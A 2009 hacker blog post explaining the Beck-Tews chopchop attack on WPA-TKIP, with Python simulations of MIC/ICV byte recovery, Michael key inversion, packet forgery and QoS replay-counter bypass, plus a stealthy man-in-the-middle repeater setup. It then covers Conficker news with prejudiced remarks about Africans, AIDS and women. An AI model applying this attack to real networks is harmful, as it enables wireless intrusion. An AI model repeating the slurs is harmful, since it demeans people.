
Monday, September 7, 2009

WPA crack in 60 seconds? and Conficker owns London council.


The article about the Beck-Tews attack on WPA-TKIP dropped last November, cutting the time it takes to break a TKIP-protected packet down to "12-15" minutes. Note what actually gets broken: not the WPA passphrase or the session key, but the MIC key plus the keystream of one short packet, which is enough to inject a handful of forged packets. "Beck-Tews" is really the "chopchop" method that has been used against WEP for years, adapted to TKIP. It takes an encrypted short packet whose contents are mostly known already (an ARP request, say) and recovers the plaintext, the 8-byte MIC and the 4-byte ICV one byte at a time from the end; because the Michael MIC function is invertible, plaintext plus MIC then gives up the MIC key, which is what you need to falsify packets. The byte-at-a-time part works because the ICV is a plain CRC-32, a linear checksum: chop the last byte off the ciphertext, guess its plaintext value, fix up the ICV to match (the correction depends only on the guess) and resend. In WEP the access point forwards the frame if the ICV checks out and silently drops it otherwise, so a relayed frame means a correct guess. In TKIP the oracle is the other way round: a frame with a correct ICV but a wrong Michael MIC makes the client send a MIC failure report, so the error message is what tells you the guess was right, and a wrong guess is dropped silently. The catch is TKIP's countermeasure: two MIC failures within 60 seconds trigger a rekey, so you wait a minute between correct guesses, and 12 bytes of MIC plus ICV at a minute each is where the 12-15 minutes come from.
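As an added example (my code, not from the original post or from the Beck-Tews paper), here is a Python simulation of that chopchop step against a TKIP frame. The CRC-32 correction table is the real arithmetic for the 802.11 ICV; the frame contents, the 8 MIC bytes, the keystream and the victim that answers with a MIC failure report are constructed stand-ins, and Michael itself is not computed here, only its 8-byte slot is recovered along with the ICV.

```python
"""
Chopchop against a TKIP frame (constructed simulation).  The 802.11 ICV is a
standard CRC-32 appended little-endian; the keystream and victim are fakes.
"""
import binascii
import random

# Reflected CRC-32 table (polynomial 0xEDB88320), the same CRC as zlib and the ICV.
def _crc_table():
    tab = []
    for k in range(256):
        c = k
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        tab.append(c)
    return tab

CRC_TABLE = _crc_table()

def chop_corrections():
    """For each possible value g of the chopped plaintext byte, the 32-bit word to
    XOR into the last four bytes of the shortened frame so its ICV is valid again.
    With r the CRC register before the last body byte x and k = (r ^ x) & 0xff,
    the chopped byte is (T[k] >> 24) ^ 0xff and the correction is
    (T[k] & 0xffffff) << 8 | (k ^ 0xff).  k -> T[k] >> 24 is a bijection, so
    every guess g maps to exactly one k."""
    corr = [0] * 256
    for k, t in enumerate(CRC_TABLE):
        corr[(t >> 24) ^ 0xFF] = ((t & 0xFFFFFF) << 8) | (k ^ 0xFF)
    return corr

CORR = chop_corrections()

def icv_frame(body):
    return body + (binascii.crc32(body) & 0xFFFFFFFF).to_bytes(4, "little")

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

class TkipVictim:
    """Constructed receive side: decrypts with the attacker-unknown keystream,
    checks the ICV and, like a real TKIP client, reports a MIC failure when the
    ICV is right but the Michael MIC is not.  That report is the oracle; a frame
    with a bad ICV is dropped without any reaction."""
    def __init__(self, keystream):
        self.ks = keystream
        self.mic_failures = 0

    def receive(self, ct):
        pt = xor(ct, self.ks)
        if binascii.crc32(pt[:-4]) & 0xFFFFFFFF != int.from_bytes(pt[-4:], "little"):
            return False            # ICV wrong: silently discarded
        self.mic_failures += 1      # ICV right, MIC wrong: MIC failure report goes out
        return True

def chopchop(victim, ct, nbytes):
    """Recover the last `nbytes` keystream bytes of ct, one per accepted guess."""
    cur = ct
    ks_tail = bytearray()
    for _ in range(nbytes):
        chopped, last = cur[:-1], cur[-1]
        for g in range(256):
            cand = chopped[:-4] + xor(chopped[-4:], CORR[g].to_bytes(4, "little"))
            if victim.receive(cand):
                ks_tail.insert(0, last ^ g)   # keystream byte at the chopped position
                cur = cand                    # shortened frame is now a valid frame again
                break
        else:
            raise RuntimeError("no guess accepted")
    return bytes(ks_tail)

def demo(seed=7):
    rng = random.Random(seed)
    # Constructed ARP-like MSDU (LLC/SNAP + ARP header) followed by 8 MIC bytes.
    msdu = bytes.fromhex("aaaa030000000806" "0001080006040001") + bytes(20)
    mic = bytes(rng.randrange(256) for _ in range(8))
    plaintext = icv_frame(msdu + mic)
    keystream = bytes(rng.randrange(256) for _ in range(len(plaintext)))
    ct = xor(plaintext, keystream)
    victim = TkipVictim(keystream)
    ks_tail = chopchop(victim, ct, 12)          # 8 MIC bytes + 4 ICV bytes
    recovered = xor(ct[-12:], ks_tail)
    # One 60 s pause per MIC failure report: victim.mic_failures minutes in total.
    return recovered == plaintext[-12:], victim.mic_failures

if __name__ == "__main__":
    print(demo())
```

demo() recovers the 12 trailing bytes of the frame (8 MIC + 4 ICV) and reports how many MIC failure reports it took; with one 60 s pause per accepted guess that is the roughly 12 minutes the post quotes. Wrong guesses cost nothing, since the victim drops them without a word, which is why only the correct guesses set the pace.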

In short: TKIP numbers every packet with a 48-bit TKIP Sequence Counter (TSC, not a "time stamp counter") that serves both as the IV and as a replay counter, and you are led to believe this makes an attack of this nature impossible. The counter is checked in WPA, and a packet whose TSC is at or below the last one seen is dropped... but no, if the victim uses the QoS (802.11e/WMM) features there are 8 channels of data flow and each channel keeps its own replay counter. Almost all traffic goes over channel 0, so the counters on the other channels lag behind. Grab an encrypted packet from the busy channel, run chopchop on it by re-injecting the chopped frames on a channel whose counter is still below the packet's TSC, then send your forged packet, encrypted with the recovered keystream, on one of those lagging channels, where its TSC is still fresh. The keystream depends only on the key, the transmitter address and the TSC, not on the channel, so it lines up. The only thing limiting you is fragmentation: the MSDU plus its MIC is broken down into MPDUs and each MPDU carries its own ICV and TSC, so you only get keystream for one MPDU of the captured length. That is why the attack focuses on short packets like ARP (or DNS) that fit in a single MPDU and whose contents are mostly known to begin with.
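To show the two pieces the falsification step then needs, here is an added Python example (mine, not from the post or the Beck-Tews paper): the Michael MIC function run backwards to get the MIC key out of one recovered plaintext/MIC pair, a fresh MIC computed with that key for a modified packet, and a toy receiver with one replay counter per QoS channel that rejects the old TSC on channel 0 but accepts it on channel 1. Michael and its padding follow IEEE 802.11i; the MAC addresses, the ARP payload, the random MIC key and the receiver class are constructed for the example.

```python
"""
Michael MIC key recovery, forgery with the recovered key, and the per-channel
replay check (constructed simulation; Michael itself follows IEEE 802.11i).
"""
import os
import struct

MASK = 0xFFFFFFFF

def rol(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK

def ror(v, n):
    return ((v >> n) | (v << (32 - n))) & MASK

def xswap(v):
    return ((v & 0xFF00FF00) >> 8) | ((v & 0x00FF00FF) << 8)

def michael_block(l, r):
    r ^= rol(l, 17); l = (l + r) & MASK
    r ^= xswap(l);   l = (l + r) & MASK
    r ^= rol(l, 3);  l = (l + r) & MASK
    r ^= ror(l, 2);  l = (l + r) & MASK
    return l, r

def michael_block_inv(l, r):
    # Every step of the block function is a bijection, so the whole MIC runs
    # backwards from its output: one plaintext/MIC pair therefore yields the key.
    l = (l - r) & MASK; r ^= ror(l, 2)
    l = (l - r) & MASK; r ^= rol(l, 3)
    l = (l - r) & MASK; r ^= xswap(l)
    l = (l - r) & MASK; r ^= rol(l, 17)
    return l, r

def michael_words(data):
    # Padding per 802.11i: 0x5a, then 4 to 7 zero bytes up to a 32-bit boundary.
    padded = data + b"\x5a" + b"\x00" * 4
    padded += b"\x00" * (-len(padded) % 4)
    return struct.unpack("<%dI" % (len(padded) // 4), padded)

def michael_input(da, sa, priority, msdu):
    # The MIC covers DA || SA || priority || 3 reserved zero bytes || MSDU,
    # so the QoS channel (priority) of the packet is part of what is authenticated.
    return da + sa + bytes([priority, 0, 0, 0]) + msdu

def michael(key, data):
    l, r = struct.unpack("<II", key)
    for w in michael_words(data):
        l, r = michael_block(l ^ w, r)
    return struct.pack("<II", l, r)

def recover_michael_key(data, mic):
    l, r = struct.unpack("<II", mic)
    for w in reversed(michael_words(data)):
        l, r = michael_block_inv(l, r)
        l ^= w
    return struct.pack("<II", l, r)

class TkipReceiver:
    """Receive-side replay check with one TSC per QoS channel (802.11e WMM has 8
    user priorities).  A frame is accepted only if its TSC exceeds the last one
    seen on that channel."""
    def __init__(self, tids=8):
        self.last_tsc = [-1] * tids

    def accept(self, tid, tsc):
        if tsc <= self.last_tsc[tid]:
            return False
        self.last_tsc[tid] = tsc
        return True

def demo():
    da, sa = bytes.fromhex("0011223344aa"), bytes.fromhex("0011223344bb")   # constructed
    mic_key = os.urandom(8)                       # victim's MIC key, unknown to the attacker
    arp = (bytes.fromhex("aaaa030000000806" "0001080006040001")   # LLC/SNAP + ARP header
           + sa + bytes([10, 0, 0, 1]) + bytes(6) + bytes([10, 0, 0, 2]))
    mic = michael(mic_key, michael_input(da, sa, 0, arp))          # captured on channel 0

    # Attacker: chopchop yielded plaintext and MIC, so invert Michael to get the key.
    key = recover_michael_key(michael_input(da, sa, 0, arp), mic)

    # Forge: change the target IP and re-MIC it for the idle channel 1.  The
    # keystream of the captured TSC is reusable because TKIP's per-packet key
    # depends on the key, transmitter address and TSC, not on the channel.
    forged = arp[:-4] + bytes([10, 0, 0, 7])
    forged_mic = michael(key, michael_input(da, sa, 1, forged))

    rx = TkipReceiver()
    captured_tsc = 4242
    for t in range(captured_tsc + 1):             # channel 0 is busy: counter already past
        rx.accept(0, t)
    return {
        "key_recovered": key == mic_key,
        "forged_mic_valid": forged_mic == michael(mic_key, michael_input(da, sa, 1, forged)),
        "replay_on_tid0": rx.accept(0, captured_tsc),
        "inject_on_tid1": rx.accept(1, captured_tsc),
    }

if __name__ == "__main__":
    print(demo())
```

demo() returns four booleans: the first two say the key was recovered and the forged MIC verifies under the victim's real key, the last two are the replay check on the busy and on the idle channel. Because the channel index is part of the Michael input, the forgery has to be re-MICed for channel 1 rather than carrying over the captured MIC, which is exactly what having the MIC key buys you.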

This still doesn't help much against WPA unless the victim is using QoS. The solution is to combine the technique with a man-in-the-middle attack. If you intercept an encrypted ARP packet en route from the access point to the client before the client ever sees it, the packet's TSC is still larger than anything the client has received so far, because it hasn't reached its destination yet. The replay check therefore won't bite, and the chopchop method can be used on it. The rest is a matter of setting your station up as a repeater: relay everything else between the two sides unmodified and falsify only the specific packets you need. With directional antennas (one pointed at the AP, one at the client) the two sides can't hear each other directly, and there is less chance of your malicious activity ever being noticed!

In Toshihiro Ohigashi and Masakatu Morii's paper entitled "A Practical Message Falsification Attack on WPA" they go further than this, with strategies for cutting the execution time of the attack down to a said ONE MINUTE in the best case.

My references are the paper above, the Wikipedia entry on the Temporal Key Integrity Protocol (Beck-Tews section), the ZDNet blog entry from November of last year, and the recent blog entry that claimed 60 seconds.

I will end by saying this... only clueless hippy girls who just acquired a router for the first time use WEP, and now that this information is widely available, it is equally stupid not to switch over to WPA2.

___


Here is some news that made me p00p a little.

LONDON COUNCIL INFECTED BY CONFICKER!


"An Ealing council employee infected the UK local authority's IT systems with the Conficker-D worm after he plugged an infected USB into a work computer, causing tens of thousands of pounds in damages in the process."

And this only makes me wonder if some guy in .ru is controlling his newest botnet recruits with Twitter. Article on botnets using Twitter!


And isn't it ironic that some guys DDoS'ed Twitter with their botnets recently? This also reminded me of the hype around Conficker when it first hit. Look at this map and take note of where the infections are NOT. I think Africans are a bunch of hakkir sleeper cells. Look at this animated movie of the spread of infection. Remind you of something?? AIDS maybe?


All bullshit aside, I just hope mosthated's best buddy Kevin Mitnick gets his internets back.
